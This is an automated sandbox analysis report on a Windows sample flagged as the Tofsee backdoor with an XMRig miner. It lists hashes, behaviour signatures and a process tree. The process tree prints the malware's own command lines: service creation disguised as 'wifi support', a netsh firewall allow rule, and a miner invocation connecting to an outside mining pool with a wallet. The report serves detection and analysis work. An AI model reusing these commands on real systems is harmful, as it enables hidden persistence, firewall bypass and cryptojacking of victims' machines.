Resubmissions

23-01-2023 11:03

230123-m5q8hada22 10

23-01-2023 11:02

230123-m5gdasef3z 10

10-05-2020 02:47

200510-dz18eg1lgs 10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    10-05-2020 02:47

General

  • Target

    supvobl.exe

  • Size

    12.5MB

  • MD5

    be286c784044379ca9a6ca6e7211a29f

  • SHA1

    bf8010a0e4b7ae88095bd9ee303707f4c0da549e

  • SHA256

    d05cd710559cb6a23a84f44bfe88b91582862c7d70134cf71807ae0c49964993

  • SHA512

    862e1beffa2cd58cd606a9edf2be79a03ca4a93f2edd6528e91eed2f68ad889e2e76dd43f164cd8f7eb02567504cbcf9581f730177f841a3e5a0298b48674b13

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\supvobl.exe
    "C:\Users\Admin\AppData\Local\Temp\supvobl.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3944
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vsmkwzq\
      2⤵
        PID:3688
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ezdvlwyw.exe" C:\Windows\SysWOW64\vsmkwzq\
        2⤵
          PID:584
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create vsmkwzq binPath= "C:\Windows\SysWOW64\vsmkwzq\ezdvlwyw.exe /d\"C:\Users\Admin\AppData\Local\Temp\supvobl.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:908
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description vsmkwzq "wifi internet conection"
            2⤵
              PID:1092
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start vsmkwzq
              2⤵
                PID:1320
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1700
              • C:\Windows\SysWOW64\vsmkwzq\ezdvlwyw.exe
                C:\Windows\SysWOW64\vsmkwzq\ezdvlwyw.exe /d"C:\Users\Admin\AppData\Local\Temp\supvobl.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1544
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Modifies service
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:2440
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe --algo=cn-heavy/tube -o tube.pool.gntl.co.uk:8080 -u bs3DRuaSUbRjZ3zryBKc1bUv4dxVdTewBfJBQcrHkbC5g4x3pc2QSnebvXwfi3DRoFNFLExjV8MDwBCgejSS6bcr2xFUqWnXA+58000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3796

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/1544-4-0x0000000002EEC000-0x0000000002EEE000-memory.dmp

                Filesize

                8KB

              • memory/1544-5-0x0000000003350000-0x0000000003351000-memory.dmp

                Filesize

                4KB

              • memory/2440-6-0x0000000000FB0000-0x0000000000FC5000-memory.dmp

                Filesize

                84KB

              • memory/2440-8-0x0000000005050000-0x000000000525F000-memory.dmp

                Filesize

                2.1MB

              • memory/2440-9-0x0000000001150000-0x0000000001156000-memory.dmp

                Filesize

                24KB

              • memory/2440-10-0x0000000001160000-0x0000000001170000-memory.dmp

                Filesize

                64KB

              • memory/2440-11-0x0000000003DF0000-0x0000000003DF5000-memory.dmp

                Filesize

                20KB

              • memory/2440-12-0x00000000096D0000-0x0000000009ADB000-memory.dmp

                Filesize

                4.0MB

              • memory/2440-13-0x0000000004400000-0x0000000004407000-memory.dmp

                Filesize

                28KB

              • memory/3796-14-0x0000000001010000-0x0000000001101000-memory.dmp

                Filesize

                964KB

              • memory/3944-1-0x0000000003430000-0x0000000003431000-memory.dmp

                Filesize

                4KB

              • memory/3944-0-0x0000000003033000-0x0000000003034000-memory.dmp

                Filesize

                4KB